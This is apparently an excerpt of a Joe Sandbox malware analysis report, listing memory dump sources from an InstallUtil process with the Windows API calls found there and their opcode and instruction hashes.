                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 05e267c26b73e96a573bfefa8baf03b6499ad11b93d3d845a2afd173072999b2
                                • Instruction ID: fcc19e086a63d63077339f3abe2195621a10e0feb3baf5b093bbcb5d6d78f372
                                • Opcode Fuzzy Hash: 05e267c26b73e96a573bfefa8baf03b6499ad11b93d3d845a2afd173072999b2
                                • Instruction Fuzzy Hash: FB41D2B1D10349DFDB14DF9AC884ADEBBB5FF48310F24812AE518AB210D7759945CF91
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06C31141
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 47e40156777ed41aae1817e0d1752325b0a4a6130c1cb799a1223487e02fc95e
                                • Instruction ID: ba9951034efb296e2e61b700035287dc494d1f3d99c72f9cfd1574be89e1eb91
                                • Opcode Fuzzy Hash: 47e40156777ed41aae1817e0d1752325b0a4a6130c1cb799a1223487e02fc95e
                                • Instruction Fuzzy Hash: A24129B4900359CFDB54CF99C848AAABBF5FF88314F28C459D519A7321D375A941CFA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190AEC7
                                Memory Dump Source
                                • Source File: 00000004.00000002.3311533054.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1900000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d567237e6615a4442ba171b99eda49945b09f8334ae56fd64c66db772de96426
                                • Instruction ID: fd4618f3cb0ea5fcf9dd9cf28ca9180ed9acf1a9757af4ec91c4d396abe0b07b
                                • Opcode Fuzzy Hash: d567237e6615a4442ba171b99eda49945b09f8334ae56fd64c66db772de96426
                                • Instruction Fuzzy Hash: E62124B58013489FDB11CFA9D984ADEBFF8EF08310F14845AE958A7351C378A954CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190AEC7
                                Memory Dump Source
                                • Source File: 00000004.00000002.3311533054.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1900000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 397c6d5dba7692245703962abc0c54e787336aff016b94a3571d88eda5d0f21e
                                • Instruction ID: 46899a03dfddd0d3891fe2068e15fb2ec8af6980be32f75866c39c24cb0e15b0
                                • Opcode Fuzzy Hash: 397c6d5dba7692245703962abc0c54e787336aff016b94a3571d88eda5d0f21e
                                • Instruction Fuzzy Hash: EF21B0B59012489FDB10CFAAD984ADEBBF9EB48310F14841AE918A3250D379A954CFA5
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06AF69F4), ref: 06AF6C2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316493895.0000000006AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6af0000_InstallUtil.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 0768276b0a6f1d3a407e1931c3369fc20839ee69e3c78a34427d9405536cd93b
                                • Instruction ID: 23a71bbd0ccdb00183dbf10a37ce5ea44c1f96f5d65158df928dfa27a6ec6124
                                • Opcode Fuzzy Hash: 0768276b0a6f1d3a407e1931c3369fc20839ee69e3c78a34427d9405536cd93b
                                • Instruction Fuzzy Hash: D21102B5D003498FDB20DF9AC444A9EFBF4EF48310F10846AE559B7200C379A545CFA1
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06C3360D
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 0ad14b75c39241a5d876a8241516b4a8f8ea441437c8094d7b5b807a382fe7bf
                                • Instruction ID: 1e39f72c4c834baf4066b05cc8cfa6f192bdb5f814330048b28cf3c279e0c2fd
                                • Opcode Fuzzy Hash: 0ad14b75c39241a5d876a8241516b4a8f8ea441437c8094d7b5b807a382fe7bf
                                • Instruction Fuzzy Hash: 031103B58003889FCB20DF9AD445BDEBBF8EB48310F20845AD519A7300D379A684CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06C3360D
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 280bf5141e20814a82aa743d3e32e12de87ca8c94f7c97ab59ec2cb70cb1363a
                                • Instruction ID: c5e8b8b0eda1d96a2d914407d6d7722336cb515a7d51661d49acbaf865aff742
                                • Opcode Fuzzy Hash: 280bf5141e20814a82aa743d3e32e12de87ca8c94f7c97ab59ec2cb70cb1363a
                                • Instruction Fuzzy Hash: EA1112B18003988FDB20DF9ED448BDEBBF8EB48320F208459D519A7300C379AA44CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06C3360D
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: f1289bbcdf656ecfa3e08a3de53900625ad9dcc359d88bbedc44de1b0f0f2f08
                                • Instruction ID: 76d801a002a85861d0e3b938dc6abfbb065c66f007e785115b656faab15ee1d3
                                • Opcode Fuzzy Hash: f1289bbcdf656ecfa3e08a3de53900625ad9dcc359d88bbedc44de1b0f0f2f08
                                • Instruction Fuzzy Hash: 62011CB58002888FCB20DF9AD4847CEFBF4EB48320F24845AD519A7310C379AA84CFA4
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 06C3360D
                                Memory Dump Source
                                • Source File: 00000004.00000002.3316897758.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6c30000_InstallUtil.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 680029a1a5ceb5cdd8b835d3f16497365275da28569f1518cbddabc331cdabb8
                                • Instruction ID: 99f68b601c59fa7b0d659bd8740916ee0c16cb438722e119232f9df423a9b432
                                • Opcode Fuzzy Hash: 680029a1a5ceb5cdd8b835d3f16497365275da28569f1518cbddabc331cdabb8
                                • Instruction Fuzzy Hash: B1E08C729003448EDB20ABAEE4083C9FBE0EF85324F25845AC11DD7220C6799588CB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.3310528886.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_16bd000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 76f375f64352aeaf7232e13296c0ed874c6f03cf9a0c6c1b08f09c5167fe5333
                                • Instruction ID: d236bcf2d2b11fa3576fe021709861137d884e6b88d5e2f178bc617920ba388e
                                • Opcode Fuzzy Hash: 76f375f64352aeaf7232e13296c0ed874c6f03cf9a0c6c1b08f09c5167fe5333
                                • Instruction Fuzzy Hash: E8210071604200DFCB15DFA8D9C0B26BF65EB88318F20C569D90A0F396C33AD487CB61
                                Memory Dump Source
                                • Source File: 00000004.00000002.3310528886.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_16bd000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3397ee1f5f3febeae0b64ed466628006503561dfc82dbc0279e2308a7e37ac03
                                • Instruction ID: 88a9fc8590cd069fd756ee1ffffc4c7bd02bd06688cd2fceb9e95475aff2cbcc
                                • Opcode Fuzzy Hash: 3397ee1f5f3febeae0b64ed466628006503561dfc82dbc0279e2308a7e37ac03
                                • Instruction Fuzzy Hash: 2C219F755093808FDB03CF24D9D4B15BF71EB46218F28C5DAD8498F2A7C33A984ACB62
                                Memory Dump Source
                                • Source File: 00000004.00000002.3310447593.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_16ad000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 45d985ece1938de6762cb916f836615965cad18fb1ded7570efe6a5e3dc2e3c1
                                • Instruction ID: 01e427722c940c98e6f99c89c770ee6101558aa6f8a23ca02bee07459c37ff1d
                                • Opcode Fuzzy Hash: 45d985ece1938de6762cb916f836615965cad18fb1ded7570efe6a5e3dc2e3c1
                                • Instruction Fuzzy Hash: 46F0C2710043549EE7208F0ACC84B66FFA8EF42324F18C45AED0C0A687C3799840CBB1